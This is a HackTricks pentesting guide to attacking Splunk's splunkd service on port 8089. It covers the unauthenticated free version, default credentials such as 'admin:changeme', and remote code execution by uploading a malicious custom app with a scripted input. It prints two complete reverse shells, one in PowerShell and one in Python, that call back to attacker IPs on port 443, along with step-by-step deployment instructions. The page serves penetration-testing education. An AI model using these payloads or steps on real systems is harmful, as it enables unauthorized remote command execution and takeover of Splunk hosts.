hacktricks/network-services-pentesting/8089-splunkd.md

151 lines
6.2 KiB
Markdown
Raw Normal View History

2024-12-12 10:39:29 +00:00
# 8089 - Pentesting Splunkd
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Basic Information**
* Log analytics tool used for data gathering, analysis, and visualization
* Commonly used in security monitoring and business analytics
* Default ports:
* Web server: 8000
* Splunkd service: 8089
### Vulnerability Vectors:
1. Free Version Exploitation
* Trial version automatically converts to free version after 60 days
* Free version lacks authentication
* Potential security risk if left unmanaged
* Administrators may overlook security implications
2. Credential Weaknesses
* Older versions: Default credentials `admin:changeme`
* Newer versions: Credentials set during installation
* Potential for weak password use (e.g., `admin`, `Welcome`, `Password123`)
3. Remote Code Execution Opportunities
* Multiple code execution methods:
* Server-side Django applications
* REST endpoints
* Scripted inputs
* Alerting scripts
* Cross-platform support (Windows/Linux)
* Scripted inputs can run:
* Bash scripts
* PowerShell scripts
* Batch scripts
Key Exploitation Potential:
* Sensitive data storage
* Lack of authentication in free version
* Multiple vectors for potential remote code execution
* Possibility of leveraging scripted inputs for system compromise
### Shodan
* `Splunk build`
## RCE
### Create Custom Application
Splunk offers a sophisticated method for remote code execution through custom application deployment, leveraging its cross-platform scripting capabilities. The core exploitation technique revolves around creating a malicious application that can execute reverse shells on both Windows and Linux systems.
A custom application can run **Python, Batch, Bash, or PowerShell scripts**. Moreover, **Splunk comes with Python installed**, so even in **Windows** systems you will be able to run python code.
You can use [**this**](https://github.com/0xjpuff/reverse_shell_splunk) example with the **`bin`** containing example for [Python](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py) and [PowerShell](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1). Or you could create your own.
The exploitation process follows a consistent methodology across platforms:
```
splunk_shell/
├── bin (reverse shell scripts)
└── default (inputs.conf configuration)
```
The critical configuration file `inputs.conf` enables the script by:
* Setting `disabled = 0`
* Configuring a 10-second execution interval
* Defining the script's source type
Deployment is straightforward:
1. Create the malicious application package
2. Set up a listener (Netcat/socat) on the attacking machine
3. Upload the application through Splunk's interface
4. Trigger automatic script execution upon upload
Sample Windows PowerShell reverse shell:
```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
```
Sample Linux Python reverse shell:
```python
import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')
```
### RCE & Privilege Escalation
In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:
{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
[splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
{% endcontent-ref %}
## References
* [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}